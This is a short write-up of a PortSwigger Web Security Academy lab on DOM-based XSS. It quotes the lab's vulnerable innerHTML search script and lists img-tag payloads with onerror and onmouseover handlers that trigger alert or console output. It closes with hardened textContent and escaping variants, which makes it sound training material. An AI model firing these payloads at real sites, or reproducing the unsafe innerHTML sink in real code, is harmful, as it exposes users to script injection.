< Problem >
https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sink
Lab: DOM XSS in innerHTML sink using source location.search | Web Security Academy
This lab contains a DOM-based cross-site scripting vulnerability in the search blog functionality. It uses an innerHTML assignment, which changes the HTML ...
< Write-Up >
<script>
    function doSearchQuery(query) {
        document.getElementById('searchMessage').innerHTML = query;
    }
    var query = (new URLSearchParams(window.location.search)).get('search');
    if(query) {
        doSearchQuery(query);
    }
</script>
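The code above is the page's <script> block. Whatever is typed into the search form becomes the value of the variable query and is written into the page through the innerHTML assignment.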
<img src='#' onerror="alert(1)">
<img src='#' onmouseover="alert(1)">
<img src="#" onerror="console.log('Test!!')"> -> check the value in the console window
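For comparison with the lab's doSearchQuery, here are two hardened variants of the same sink, as an added example that is not part of the lab page or the original write-up. The function names doSearchQueryText, doSearchQueryEscaped, escapeHtml and getSearchParam are hypothetical, and the element is passed in as a parameter so the logic can be exercised outside a browser.

```javascript
// Added example: hardened variants of the lab's doSearchQuery (hypothetical names).

// Variant 1: write the query as text. textContent does not invoke the HTML
// parser, so markup in the query is shown literally and no element is created.
function doSearchQueryText(element, query) {
  element.textContent = query;
}

// Variant 2: if innerHTML has to stay, encode the characters that are
// significant to the HTML parser before assigning.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;'
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

function doSearchQueryEscaped(element, query) {
  element.innerHTML = escapeHtml(query);
}

// Same source as the lab page: the "search" parameter of location.search.
function getSearchParam(search) {
  return new URLSearchParams(search).get('search');
}

// Browser wiring, equivalent to the lab's script but using the text sink.
if (typeof document !== 'undefined') {
  const query = getSearchParam(window.location.search);
  if (query) {
    doSearchQueryText(document.getElementById('searchMessage'), query);
  }
}
```

With either variant the first string listed above is rendered as visible text in searchMessage and its onerror handler is never attached to an element.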
< References >
https://www.w3schools.com/jsref/dom_obj_event.asp
HTML DOM Event Object